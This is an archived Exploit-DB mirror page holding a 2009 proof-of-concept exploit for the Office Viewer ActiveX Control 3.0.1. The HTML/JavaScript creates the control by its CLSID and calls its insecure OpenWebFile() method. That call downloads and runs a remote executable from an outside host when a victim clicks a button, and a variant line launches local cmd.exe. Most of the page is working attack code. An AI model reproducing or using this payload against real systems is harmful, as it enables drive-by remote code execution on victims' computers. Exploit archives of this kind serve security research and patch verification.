bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/7749.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
1.1 KiB
HTML
Raw Permalink Blame History

=======================================================================================<br>
Author: Houssamix <br>
=======================================================================================<br>
Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit <br>
download : http://www.anydraw.com/download/EOfficeOCX.exe <br>
Tested on Windows XP Professional SP2 , with Internet Explorer 6 <br><br>
description : this use to insecure methods "OpenWebFile()" for execute remote file in pc victime <br>
u can also execute a local file in pc victime usign this methode "Open()" , just change the function do_it with this : <b>
function Do_it()
{
File = "c:\\windows\\system32\\cmd.exe"
hsmx.OpenWebFile(File)
}
<br>
=======================================================================================<br>
<HTML>
<BODY>
<object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>
<SCRIPT>
function Do_it()
{
File = "http://test.com/file.exe"
hsmx.OpenWebFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">
</body>
</HTML>
# milw0rm.com [2009-01-13]
Reference in a new issue View git blame Copy permalink